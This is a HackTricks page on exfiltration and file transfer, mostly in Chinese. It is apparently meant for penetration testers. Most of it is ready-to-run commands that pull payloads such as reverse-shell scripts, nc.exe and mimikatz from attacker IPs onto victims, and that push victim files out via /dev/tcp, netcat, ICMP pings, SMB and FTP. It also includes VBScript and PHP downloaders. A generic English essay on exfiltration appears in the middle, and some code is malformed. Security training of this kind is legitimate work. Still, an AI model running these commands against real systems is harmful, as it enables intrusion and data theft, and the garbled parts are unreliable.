hacktricks/generic-methodologies-and-resources/exfiltration.md

数据泄露

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

支持HackTricks的其他方式：

• 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看订阅计划!
• 获取官方PEASS & HackTricks周边产品
• 发现PEASS家族，我们的独家NFTs
• 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @hacktricks_live。
• 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

常见的白名单域名用于信息泄露

查看https://lots-project.com/以找到可以被滥用的常见白名单域名

复制&粘贴Base64

Linux

base64 -w0 <file> #Encode file
base64 -d file #Decode file

Windows

certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll

HTTP

Linux

wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD

Windows

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf

#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

上传文件

• SimpleHttpServerWithFileUploads
• SimpleHttpServer printing GET and POSTs (also headers)
• Python 模块 uploadserver:

# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world

# Send a file
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world

HTTPS 服务器

# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:443

### PYTHON 2
import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
###

### PYTHON3
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
###

### USING FLASK
from flask import Flask, redirect, request
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
###

FTP

FTP服务器（Python）

pip3 install pyftpdlib
python3 -m pyftpdlib -p 21

FTP服务器（NodeJS）

sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp

FTP服务器（pure-ftp）

apt-get update && apt-get install pure-ftp

#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

Windows 客户端

#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt

SMB

Kali作为服务器

kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`

或者使用samba创建一个smb共享：

apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart

Exfiltration

Introduction

Exfiltration is the unauthorized transfer of data from a target system. After gaining access to a system, an attacker may want to exfiltrate sensitive information such as user credentials, financial data, or intellectual property. This data can be exfiltrated using various techniques, including network-based exfiltration, data exfiltration over DNS, and exfiltration using cloud storage services.

Techniques

Network-Based Exfiltration

Network-based exfiltration involves sending data outside the target network to a system controlled by the attacker. This can be achieved by using protocols such as HTTP, HTTPS, FTP, or DNS to transfer data to an external server.

Data Exfiltration over DNS

Data exfiltration over DNS involves encoding data in DNS queries or responses to bypass network security controls. Attackers can use tools like dnscat2 to exfiltrate data over DNS channels.

Exfiltration Using Cloud Storage Services

Attackers can exfiltrate data by uploading it to cloud storage services such as Dropbox, Google Drive, or OneDrive. This method allows attackers to bypass network security controls and store exfiltrated data in the cloud.

Tools

There are various tools available to facilitate data exfiltration during a penetration test. Some popular tools include:

• Cobalt Strike: A threat emulation software that includes features for exfiltrating data.
• Empire: A post-exploitation framework that can be used for data exfiltration.
• PowerShell: A powerful scripting language that can be used to exfiltrate data from Windows systems.

Conclusion

Exfiltration is a critical phase of a penetration test, as it allows the attacker to steal valuable information from the target system. By understanding exfiltration techniques and using the right tools, penetration testers can assess an organization's security posture and help improve its defenses against data exfiltration attacks.

CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials

WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:

SCP

攻击者必须运行SSHd。

scp <username>@<Attacker_IP>:<directory>/<filename>

SSHFS

如果受害者有SSH，攻击者可以将受害者的目录挂载到攻击者的计算机上。

sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/

网络通道

nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file

/dev/tcp

从受害者下载文件

nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim

上传文件至受害者

nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat <&6 > file.txt

感谢 @BinaryShadow_

ICMP

# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will 4bytes per ping packet (you could probably increase this until 16)

from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)

SMTP

如果您可以将数据发送到SMTP服务器，您可以使用Python创建一个SMTP来接收数据：

sudo python -m smtpd -n -c DebuggingServer :25

TFTP

在XP和2003中默认启用（在其他系统中需要在安装过程中显式添加）

在Kali中，启动TFTP服务器：

#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp

Python中的TFTP服务器：

pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>

在受害者中，连接到Kali服务器：

tftp -i <KALI-IP> get nc.exe

PHP

使用 PHP 一行代码下载文件：

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

VBScript

Visual Basic 脚本 (VBScript) 是一种基于 Visual Basic 的脚本语言，通常用于 Windows 环境中。VBScript 可以用于执行各种系统管理任务和自动化操作。

Attacker> python -m SimpleHTTPServer 80

受害者

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.5/evil.exe evil.exe

Debug.exe

debug.exe程序不仅允许检查二进制文件，还具有从十六进制重建它们的能力。这意味着通过提供一个二进制文件的十六进制表示，debug.exe可以生成该二进制文件。然而，需要注意的是，debug.exe有一个组装文件大小限制为64 kb。

# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt

DNS

• https://github.com/62726164/dns-exfil

然后将文本复制粘贴到Windows shell中，将创建一个名为nc.exe的文件。